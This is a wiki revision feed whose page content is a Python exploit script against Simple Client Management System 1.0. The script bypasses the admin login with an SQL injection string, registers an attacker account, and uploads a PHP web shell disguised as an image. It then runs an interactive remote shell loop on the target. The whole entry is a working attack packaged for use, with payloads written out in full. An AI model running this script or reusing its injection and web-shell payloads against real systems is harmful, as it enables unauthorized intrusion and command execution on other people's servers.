<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Simple_Client_Management_System_1.0_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>Simple Client Management System 1.0 遠程代碼執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Simple_Client_Management_System_1.0_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Simple_Client_Management_System_1.0_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-08T16:44:15Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Simple_Client_Management_System_1.0_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=6416&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;&lt;pre&gt; # Exploit Title: Simple Client Management System 1.0 - Remote Code Execution (RCE) # Date: July 4, 2021 # Exploit Author: Ishan Saha # Vendor Homepage: https://www.sourc...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Simple_Client_Management_System_1.0_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=6416&amp;oldid=prev"/>
		<updated>2021-07-06T00:54:33Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;&amp;lt;pre&amp;gt; # Exploit Title: Simple Client Management System 1.0 - Remote Code Execution (RCE) # Date: July 4, 2021 # Exploit Author: Ishan Saha # Vendor Homepage: https://www.sourc...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Simple Client Management System 1.0 - Remote Code Execution (RCE)&lt;br /&gt;
# Date: July 4, 2021&lt;br /&gt;
# Exploit Author: Ishan Saha&lt;br /&gt;
# Vendor Homepage: https://www.sourcecodester.com/&lt;br /&gt;
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/client-details.zip&lt;br /&gt;
# Version: 1.0&lt;br /&gt;
# Tested on: Windows 10 Home 64 Bit + Wampserver Version 3.2.3 &amp;amp; Ubuntu &amp;amp; Kali&lt;br /&gt;
&lt;br /&gt;
#!/usr/bin/python&lt;br /&gt;
&lt;br /&gt;
# Description:&lt;br /&gt;
&lt;br /&gt;
# 1. This uses the SQL injection to bypass the admin login and create a new user&lt;br /&gt;
# 2. The new user makes a client with the shell payload and uploads the generic shellcode into the server&lt;br /&gt;
# 3. the shell is called from the location &lt;br /&gt;
&lt;br /&gt;
import requests &lt;br /&gt;
from colorama import Fore, Back, Style&lt;br /&gt;
'''&lt;br /&gt;
Description:&lt;br /&gt;
Using the sql injeciton to bypass the login and create a user. &lt;br /&gt;
This user creates a client with the shell as an image and uploads the shell.&lt;br /&gt;
The shell is called by the requests library for easier use.&lt;br /&gt;
------------------------------------------&lt;br /&gt;
Developed by - Ishan Saha &amp;amp; HackerCTF team  (https://twitter.com/hackerctf)&lt;br /&gt;
------------------------------------------&lt;br /&gt;
'''&lt;br /&gt;
# Variables : change the URL according to need&lt;br /&gt;
URL=&amp;quot;http://192.168.0.248/client/&amp;quot;&lt;br /&gt;
shellcode = &amp;quot;&amp;lt;?php system($_GET['cmd']);?&amp;gt;&amp;quot;&lt;br /&gt;
filename = &amp;quot;shell.php&amp;quot;&lt;br /&gt;
authdata={&amp;quot;username&amp;quot;:&amp;quot;admin' or '1'='1&amp;quot;,&amp;quot;password&amp;quot;:&amp;quot;admin' or '1'='1&amp;quot;,&amp;quot;login&amp;quot;:&amp;quot;Submit Query&amp;quot;}&lt;br /&gt;
createuser = {&amp;quot;fname&amp;quot;:&amp;quot;ishan&amp;quot;,&amp;quot;lname&amp;quot;:&amp;quot;saha&amp;quot;,&amp;quot;email&amp;quot;:&amp;quot;research@hackerctf.com&amp;quot;,&amp;quot;password&amp;quot;:&amp;quot;Grow_with_hackerctf&amp;quot;,&amp;quot;contact&amp;quot;:&amp;quot;1234567890&amp;quot;,&amp;quot;signup&amp;quot;:&amp;quot;Sign Up&amp;quot;}&lt;br /&gt;
userlogin={&amp;quot;uemail&amp;quot;:&amp;quot;research@hackerctf.com&amp;quot;,&amp;quot;password&amp;quot;:&amp;quot;Grow_with_hackerctf&amp;quot;,&amp;quot;login&amp;quot;:&amp;quot;LOG IN&amp;quot;}&lt;br /&gt;
shelldata={&amp;quot;fname&amp;quot;:&amp;quot;a&amp;quot;,&amp;quot;lname&amp;quot;:&amp;quot;l&amp;quot;,&amp;quot;uname&amp;quot;:&amp;quot;l&amp;quot;,&amp;quot;email&amp;quot;:&amp;quot;l@l.l&amp;quot;,&amp;quot;phone&amp;quot;:&amp;quot;1234567890&amp;quot;,&amp;quot;plan&amp;quot;:&amp;quot;k&amp;quot;,&amp;quot;pprice&amp;quot;:&amp;quot;k&amp;quot;,&amp;quot;proofno&amp;quot;:&amp;quot;l&amp;quot;,&amp;quot;caddress&amp;quot;:&amp;quot;ll&amp;quot;,&amp;quot;haddress&amp;quot;:&amp;quot;ll&amp;quot;,&amp;quot;rdate&amp;quot;:&amp;quot;9/9/09&amp;quot;,&amp;quot;bdate&amp;quot;:&amp;quot;9/9/09&amp;quot;,&amp;quot;depatment&amp;quot;:&amp;quot;l&amp;quot;,&amp;quot;csubmit&amp;quot;:&amp;quot;Submit&amp;quot;}&lt;br /&gt;
def format_text(title,item):&lt;br /&gt;
  cr = '\r\n'&lt;br /&gt;
  section_break=cr + '*'*(len(str(item))+len(title)+ 3) + cr &lt;br /&gt;
  item=str(item)&lt;br /&gt;
  text= Fore.YELLOW +section_break + Style.BRIGHT+ Fore.RED + title + Fore.RESET +&amp;quot; : &amp;quot;+  Fore.BLUE + item + Fore.YELLOW + section_break + Fore.RESET&lt;br /&gt;
  return text&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
ShellSession = requests.Session()&lt;br /&gt;
response = ShellSession.get(URL)&lt;br /&gt;
response = ShellSession.post(URL + &amp;quot;admin/index.php&amp;quot;,data=authdata)&lt;br /&gt;
response = ShellSession.post(URL + &amp;quot;admin/regester.php&amp;quot;,data=createuser)&lt;br /&gt;
response = ShellSession.post(URL,data=userlogin)&lt;br /&gt;
response = ShellSession.post(URL + &amp;quot;create.php&amp;quot;,data=shelldata,files={&amp;quot;uimg&amp;quot;:(filename,shellcode,&amp;quot;application/php&amp;quot;),&amp;quot;proof1&amp;quot;:(filename,shellcode,&amp;quot;application/php&amp;quot;),&amp;quot;proof2&amp;quot;:(filename,shellcode,&amp;quot;application/php&amp;quot;)})&lt;br /&gt;
location = URL +&amp;quot;img/&amp;quot; + filename&lt;br /&gt;
#print statements&lt;br /&gt;
print(format_text(&amp;quot;Target&amp;quot;,URL),end='')&lt;br /&gt;
print(format_text(&amp;quot;Shell Upload&amp;quot;,&amp;quot;success&amp;quot; if response.status_code ==200 else &amp;quot;fail&amp;quot;),end='')&lt;br /&gt;
print(format_text(&amp;quot;shell location&amp;quot;,location),end='')&lt;br /&gt;
print(format_text(&amp;quot;Initiating Shell&amp;quot;,&amp;quot;[*]Note- This is a custom shell, upgrade to NC!&amp;quot;))&lt;br /&gt;
&lt;br /&gt;
while True:&lt;br /&gt;
    cmd = input(Style.BRIGHT+ Fore.RED+&amp;quot;SHELL&amp;gt;&amp;gt;&amp;gt; &amp;quot;+ Fore.RESET)&lt;br /&gt;
    if cmd == 'exit':&lt;br /&gt;
        break&lt;br /&gt;
    print(ShellSession.get(location + &amp;quot;?cmd=&amp;quot;+cmd).content.decode())&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>